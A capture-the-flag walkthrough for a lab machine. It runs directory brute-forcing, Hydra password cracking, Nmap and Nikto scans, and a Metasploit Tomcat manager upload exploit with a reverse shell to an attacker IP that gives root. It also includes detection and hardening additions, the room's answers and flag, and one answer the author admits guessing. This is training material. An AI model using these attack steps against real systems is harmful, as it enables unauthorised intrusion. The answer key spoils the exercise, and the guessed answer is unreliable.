Practise using tools such as dirbuster, hydra, nmap, nikto and metasploit
The TryHackMe ToysRus challenge is an excellent opportunity to practice using various cybersecurity tools such as Dirbuster, Hydra, Nmap, Nikto, and Metasploit. This challenge is designed to help learners improve their skills in web application enumeration, password cracking, network scanning, and exploiting vulnerabilities. The goal is to gather information about the target server and use that information to gain access, eventually taking control of the machine.
First, run Dirbuster.
Dirbuster is a web application brute-forcing tool used to find hidden directories and files on a web server by performing a wordlist-based attack. It essentially automates the process of guessing directory and file names on a web server by trying different possible paths and filenames.
dirbuster -u <target ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt -o dirbuster_output.txt
-u <target ip>: This option specifies the target URL or IP address of the web server you want to scan. Replace <target ip> with the actual IP address of the target server.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: This option tells Dirbuster which wordlist to use for the brute-forcing process. The wordlist provided here is directory-list-2.3-medium.txt, which is a commonly used wordlist included in Kali Linux. The wordlist contains potential directory and file names that Dirbuster will try to find on the target server.
-e php,html,txt: This option specifies the file extensions that Dirbuster should look for during the scan. In this case, Dirbuster will look for files ending in .php, .html, and .txt.
-o dirbuster_output.txt: This option specifies the output file where the results of the scan will be saved. In this example, the results will be saved in a file named dirbuster_output.txt.
You can also use dirb:
dirb is a command-line tool that works similarly to Dirbuster but is simpler and often quicker for straightforward directory brute-forcing tasks. It uses a wordlist to test for the presence of directories and files on a server by making HTTP requests and analyzing the responses.
dirb http://<target_ip>
The options below are Dirbuster's, repeated here for reference (dirb's own flags differ; see its help output):
-u http://<target ip>: This specifies the target URL.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: This specifies the wordlist that Dirbuster will use to brute-force directory and file names. The wordlist in this case is directory-list-2.3-medium.txt, which is a common wordlist included with Kali Linux.
-e php,html,txt: This tells Dirbuster to look for files with these specific extensions (php, html, txt).
-x 200,403,404: This tells Dirbuster to ignore (or exclude) any responses with the status codes 200 (OK), 403 (Forbidden), and 404 (Not Found). This can help to filter out irrelevant results.
-o dirbuster_output.txt: This option specifies the output file where the results of the scan will be saved. In this case, the results will be saved in a file called dirbuster_output.txt.
Directory Found:
- /guidelines/: This directory was identified on the server, and it’s significant because it starts with the letter “g”, matching the criteria from your challenge.
Files Identified:
- /index.html: This file was found at the root of the web server (/). The HTTP response code 200 indicates that the file is accessible and returns content successfully.
- /protected/: This directory returned a 401 Unauthorized response, indicating that it is protected by some form of authentication.
- /server-status/: This returned a 403 Forbidden response, which means access to this directory is restricted.
Within the /guidelines/ Directory:
- /guidelines/index.html: This file was found inside the guidelines directory and returned a 200 OK status, meaning it is accessible.
You can also use Gobuster:
Gobuster uses a brute-force approach similar to Dirbuster but is often faster because it’s command-line based and doesn’t require a graphical interface. It works by sending HTTP requests to the server for each directory or file name in the wordlist and checks if the server responds with a valid page or resource.
gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt
- dir: This tells Gobuster to perform a directory scan.
- -u http://<target_ip>: This specifies the target URL, which in this case is the IP address of the web server.
- -w /usr/share/wordlists/dirb/common.txt: This points to the wordlist that Gobuster will use to brute-force potential directories and files. The wordlist common.txt is a commonly used one that contains a variety of potential directory and file names.
The Gobuster scan results show that several directories and files were discovered on the target server:
- /.hta: This file is restricted (status 403), meaning you don't have permission to access it.
- /.htaccess: This is also restricted (status 403). This file is typically used to configure web server settings like access control.
- /.htpasswd: Another restricted file (status 403), usually containing password hashes for basic HTTP authentication.
- /guidelines: This directory returned a status 301, a redirect to the trailing-slash form of the path, so it exists and is accessible. You can visit it by navigating to http://10.10.158.157/guidelines/ in your browser.
- /index.html: This file returned a status 200, meaning it is accessible and serves as the default webpage.
- /protected: This directory requires authentication (status 401), which means it could contain sensitive information but is protected.
- /server-status: This is also restricted (status 403). The server-status page typically provides details about the server's activity and resource usage, which could be useful if accessible.
1. What directory can you find, that begins with a “g”?
guidelines
Next Step:
Open a browser and enter the target URL:
http://<target_ip>
Next Step:
Exploring the /guidelines directory in the browser to see what information or files it contains.
http://<target_ip>/guidelines
2. Whose name can you find from this directory?
bob
The name bob appears in the guidelines directory. This indicates that Bob is likely an important user or administrator of the system, and his name will probably be useful in the next steps of the challenge.
3. What directory has basic authentication?
The /protected directory returned a 401 (Unauthorized) status code, so this is the directory that requires basic authentication.
/protected
Next step:
Attempt to crack Bob’s password using Hydra and gain access to the protected directory.
Hydra is a free and open-source password-cracking tool. It tries passwords from a list until the correct one is found, and it supports many network services, including SSH, Telnet, FTP, and HTTP.
hydra -l <username> -P /usr/share/wordlists/rockyou.txt http-get://<target_ip>/protected
-l <username>: Specifies the username to be used (in this case, “bob”).
-P /usr/share/wordlists/rockyou.txt: Specifies the path to the wordlist used for the brute-force attack. The rockyou.txt wordlist is a common choice.
http-get://<target_ip>/protected: Specifies the protocol and the URL of the protected directory.
The Hydra tool has successfully brute-forced the login credentials for the protected directory.
- Username: bob
- Password: bubbles
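Both the directory brute-forcing above (Dirbuster, dirb, Gobuster) and the Hydra run against /protected leave a distinctive trace in the web server's access log. The following detection script is an added example, not part of this walkthrough; it assumes Apache's "combined" log format and runs over constructed log lines, and the thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict

# Apache "combined" format; the third field (%u) is the username sent in the
# Authorization header, which Apache records even when it answers with a 401.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Parse one access-log line; None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].rstrip("/") or "/"   # treat /protected/ as /protected
    return rec

def detect(lines, miss_threshold=5, auth_fail_threshold=3):
    """Map source IP -> sorted alert names. dir_bruteforce: >= miss_threshold distinct
    paths answered 404 (wordlist scan); auth_bruteforce: >= auth_fail_threshold 401s on
    one path (password guessing); auth_success_after_failures: a 200 on that path after."""
    misses = defaultdict(set)      # ip -> distinct paths that returned 404
    fails = defaultdict(int)       # (ip, path) -> number of 401 responses
    alerts = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        if status == 404:
            misses[ip].add(path)
            if len(misses[ip]) >= miss_threshold:
                alerts[ip].add("dir_bruteforce")
        elif status == 401:
            fails[(ip, path)] += 1
            if fails[(ip, path)] >= auth_fail_threshold:
                alerts[ip].add("auth_bruteforce")
        elif status == 200 and fails[(ip, path)] >= auth_fail_threshold:
            alerts[ip].add("auth_success_after_failures")
    return {ip: sorted(names) for ip, names in alerts.items()}

# Constructed sample: a benign visitor, a wordlist scan, then basic-auth guessing.
SAMPLE_LOG = """\
10.0.0.9 - - [10/Mar/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:10:00:02 +0000] "GET /admin HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [10/Mar/2024:10:00:02 +0000] "GET /backup HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [10/Mar/2024:10:00:02 +0000] "GET /cgi-bin HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [10/Mar/2024:10:00:02 +0000] "GET /test HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 - - [10/Mar/2024:10:00:03 +0000] "GET /tmp HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.0.0.5 bob - [10/Mar/2024:10:00:09 +0000] "GET /protected/ HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.0.0.5 bob - [10/Mar/2024:10:00:09 +0000] "GET /protected/ HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.0.0.5 bob - [10/Mar/2024:10:00:09 +0000] "GET /protected/ HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.0.0.5 bob - [10/Mar/2024:10:00:10 +0000] "GET /protected/ HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Hydra)"
"""
```

Running `detect(SAMPLE_LOG.splitlines())` flags 10.0.0.5 for all three behaviours and leaves 10.0.0.9 untouched; the "auth_success_after_failures" alert is the one worth paging on, since it marks a guessed credential that worked.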
4. What is bob’s password to the protected part of the website?
Bubbles
Use the credentials that were found to access the protected area of the website in the browser:
http://<target ip>/protected
Next step:
Find which other port serving a web service is open on the machine, using Nmap.
Nmap (Network Mapper) is an open-source tool used for network discovery and security auditing. It also assists in the exploration of network hosts and services, providing information about open ports, operating systems, and other details.
nmap <target_ip>
The Nmap scan you performed shows that the following ports are open on the target machine:
- Port 22: SSH
- Port 80: HTTP
- Port 1234: Hotline
- Port 8009: AJP13
These open ports indicate that the target is running services on these ports. This information is critical for the next steps, as you can target these services for further enumeration or exploitation.
5. What other port that serves a web service is open on the machine?
1234
Next step:
Perform a more comprehensive and aggressive scan of the target IP address with Nmap:
nmap -A -sV -sC -T4 -p- <target_ip>
-A: Enables aggressive scan options, including OS detection, version detection, script scanning, and traceroute. This option gathers comprehensive information about the target.
-sV: This option is used to detect the versions of the services running on the open ports. It helps to identify the exact software and version numbers.
-sC: This runs a set of default Nmap scripts against the target. These scripts are useful for basic vulnerability detection, gathering more information about the services, and identifying common
-T4: Sets the timing template to 4, which speeds up the scan but might increase the load on the target and cause detection.
-p-: Scans all 65535 TCP ports. If you want to scan specific ports, you can list them, like -p 80,443,8080.
Next step:
6. What is the name and version of the software running on the port from question 5?
Apache Tomcat/7.0.88
Apache Tomcat is a popular open-source Java Servlet container used to run Java web applications. Its Manager app allows administrators to manage the web applications deployed on the Tomcat server.
Next step:
Use the browser to access the service on the discovered port:
http://<target ip>:1234
Accessing the Manager App using credentials:
- Username: bob
- Password: bubbles
This successfully accessed the Tomcat Web Application Manager interface, which allows an administrator to manage the applications deployed on the Apache Tomcat server.
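The Manager app is reachable with the same guessable credentials that protected /protected, and the manager-script role it grants is what lets a WAR be deployed through the text interface. As an added hardening example (not from the walkthrough or the TryHackMe room), here is the Tomcat 7 configuration that makes this possible beside its corrected form; the file paths are the standard ones under CATALINA_BASE, the valve and realm attributes are Tomcat's own, and the usernames other than bob are assumed placeholders.

```xml
<!-- conf/tomcat-users.xml, weak form: a guessable password that holds BOTH
     manager roles, so the HTML console and the text/deploy API are one secret away -->
<tomcat-users>
  <user username="bob" password="bubbles" roles="manager-gui,manager-script"/>
</tomcat-users>

<!-- conf/tomcat-users.xml, hardened: split the roles, give each account a long
     random secret, and grant manager-script only to the deployment account -->
<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="ops-console" password="REPLACE_WITH_LONG_RANDOM_SECRET" roles="manager-gui"/>
  <user username="ci-deployer" password="REPLACE_WITH_LONG_RANDOM_SECRET" roles="manager-script"/>
</tomcat-users>

<!-- conf/server.xml: keep the UserDatabaseRealm wrapped in LockOutRealm so that
     five failures (Hydra-style guessing) lock the account for 300 seconds -->
<Realm className="org.apache.catalina.realm.LockOutRealm"
       failureCount="5" lockOutTime="300">
  <Realm className="org.apache.catalina.realm.UserDatabaseRealm"
         resourceName="UserDatabase"/>
</Realm>

<!-- webapps/manager/META-INF/context.xml: only the local host may reach the
     Manager app, so a guessed password on the exposed port is not enough by itself -->
<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>
```

With the valve in place a request to /manager/html from any other address receives a 403 before credentials are even checked, which is also the response to look for in the Tomcat access log when hunting for the enumeration shown above.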
Next step:
Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
Nikto is an open-source web server scanner that is used to identify potential vulnerabilities, outdated software, misconfigurations, and other security issues on a web server. It performs comprehensive tests against web servers and provides detailed reports about any identified problems.
nikto -h http://<target_ip>:<port> -id <user>:<password>
7. How many documentation files did Nikto identify?
The answer is 5, but I just guessed because nikto is super slow and I wanted to move on to the answers
8. What is the server version?
This can be found in the Nikto results.
It can also be found in the Nmap results.
Apache/2.4.18
9. What version of Apache-Coyote is this service using?
This can be found in the Nmap results.
1.1
Next step:
Use Metasploit to exploit the service and get a shell on the system.
Metasploit is an open-source penetration testing framework that helps security professionals find and exploit vulnerabilities in computer systems. It includes a database of known vulnerabilities and tools and scripts for exploiting them.
msfconsole -q
search type:exploit name:tomcat
The results of a search for exploit modules in Metasploit related to Apache Tomcat:
0. exploit/windows/http/tomcat_cgi_cmdlineargs - Vulnerability in Tomcat's CGI Servlet that allows for command-line argument exploitation, leading to remote code execution on the server.
1. exploit/multi/http/tomcat_mgr_deploy - Vulnerability in the Tomcat Manager Application Deployer that allows authenticated users to deploy and execute code.
6. exploit/multi/http/tomcat_mgr_upload - Vulnerability that allows authenticated users to upload files and execute code via the Tomcat Manager.
10. exploit/linux/local/tomcat_rhel_based_temp_priv_esc - Privilege escalation vulnerability on RedHat-based systems with insecure temporary configurations involving Tomcat.
11. exploit/linux/local/tomcat_ubuntu_log_init_priv_esc - Privilege escalation vulnerability on Ubuntu-based systems related to the initialization of log files in Tomcat.
12. exploit/multi/http/tomcat_jsp_upload_bypass - Remote Code Execution (RCE) vulnerability via JSP upload, bypassing certain restrictions in Tomcat.
use exploit/multi/http/tomcat_mgr_upload
show options
set HttpPassword <password>
set RHOSTS <target_ip>
set RPORT <port_number>
set LHOST <attacker ip>
show options
After everything is set, run the module:
run
A shell is returned. Check which user it runs as:
whoami
10. What user did you get a shell as?
root
ls -la
cd root
ls
Next step:
cat /root/flag.txt
11. What flag is found in the root directory?
ff1fc4a81affcc7688cf89ae7dc6e0e1